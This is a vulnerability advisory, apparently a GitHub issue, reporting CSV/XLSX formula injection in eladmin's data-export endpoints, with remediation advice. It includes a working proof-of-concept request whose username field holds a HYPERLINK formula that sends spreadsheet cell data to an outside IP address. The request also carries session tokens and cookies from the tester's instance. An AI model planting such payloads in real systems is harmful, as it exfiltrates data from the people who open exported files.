CSV/XLSX Injection in 19 Endpoints of eladmin ≤ 2.7 (CWE-1236) #886
Description
CSV/XLSX Injection in 19 Endpoints of eladmin ≤ 2.7 (CWE-1236)
Summary
In eladmin versions up to 2.7, 19 endpoints are vulnerable to CSV/XLSX injection, which can lead to sensitive information disclosure when malicious spreadsheet formulas are executed.
Vulnerability Description
When exporting data to CSV or XLSX format, the application fails to sanitize special characters such as = and @. These characters are directly included in the exported file, allowing malicious spreadsheet formulas to be injected.
Example vulnerable code:
@ApiOperation("导出用户数据")
@GetMapping(value = "/download")
@PreAuthorize("@el.check('user:list')")
public void exportUser(HttpServletResponse response, UserQueryCriteria criteria) throws IOException {
userService.download(userService.queryAll(criteria), response);
}Exploitation
Using /api/users/download as an example:
First, send a request to /api/users to register a username containing a malicious XLSX formula.
POST /api/users HTTP/1.1
Host: localhost:8013
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=d16b68d0baae48739ab4acdb03e9efd5; cc_cookie=%7B%22categories%22%3A%5B%22necessary%22%2C%22analytics%22%5D%2C%22revision%22%3A0%2C%22data%22%3Anull%2C%22consentTimestamp%22%3A%222025-08-09T11%3A02%3A33.095Z%22%2C%22consentId%22%3A%2236b540b5-c17a-4173-83a2-170ea77a1320%22%2C%22services%22%3A%7B%22necessary%22%3A%5B%5D%2C%22analytics%22%3A%5B%5D%7D%2C%22languageCode%22%3A%22en%22%2C%22lastConsentTimestamp%22%3A%222025-08-09T11%3A02%3A33.095Z%22%2C%22expirationTime%22%3A1770462153096%7D; username=admin; rememberMe=true; password=dm48PXaj4zProjs3wkI/Tq1hmptyDbbW2MA3g5yBmra6cZvYu4tXH8rc5iKWfAfBYOj5gl9wLh0TSheYE5aAow==; ELADMIN-TOEKN=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiI5YjEzNDUyMTJmNDY0NDMxOTlkNTRkN2JhOGRjMmJlMiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.QIRDcsKcS6Pg_gHx2kG8gPdgW4v6lA-O-9TSAp8jIt_nBb9cuamqmWG-WGpqPWcXsVpsqHD7kG7Gsi4jKilp4g
sec-ch-ua-platform: "Windows"
Referer: http://localhost:8013/system/user
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br, zstd
Origin: http://localhost:8013
Sec-Fetch-Mode: cors
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiI5YjEzNDUyMTJmNDY0NDMxOTlkNTRkN2JhOGRjMmJlMiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.QIRDcsKcS6Pg_gHx2kG8gPdgW4v6lA-O-9TSAp8jIt_nBb9cuamqmWG-WGpqPWcXsVpsqHD7kG7Gsi4jKilp4g
Accept: application/json, text/plain, */*
Sec-Fetch-Dest: empty
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Content-Length: 183
{"id":null,"username":"=HYPERLINK(\"http://123.57.23.40:1111/\"&A2&A3,\"test\")","nickName":"12345","gender":"男","email":"[email protected]","enabled":"false","roles":[{"id":1}],"jobs":[{"id":8}],"dept":{"id":7},"phone":18641372919}
Next, download the XLSX file via /api/users/download and open it in a spreadsheet application to observe the injected formula.
Clicking the malicious cell triggers the injection and results in exfiltration of data. In this case, the system username is disclosed.
Impacted Endpoints
This issue affects the following 19 routes:
Impact
-
Execution of malicious spreadsheet formulas on the client machine
-
Possible disclosure of sensitive information through external requests
-
Potential for local code execution in certain spreadsheet applications with vulnerable configurations
Remediation
Perform strict sanitization on all fields before exporting to CSV/XLSX, ensuring special characters such as =, @, +, and - at the beginning of a cell are properly escaped or removed.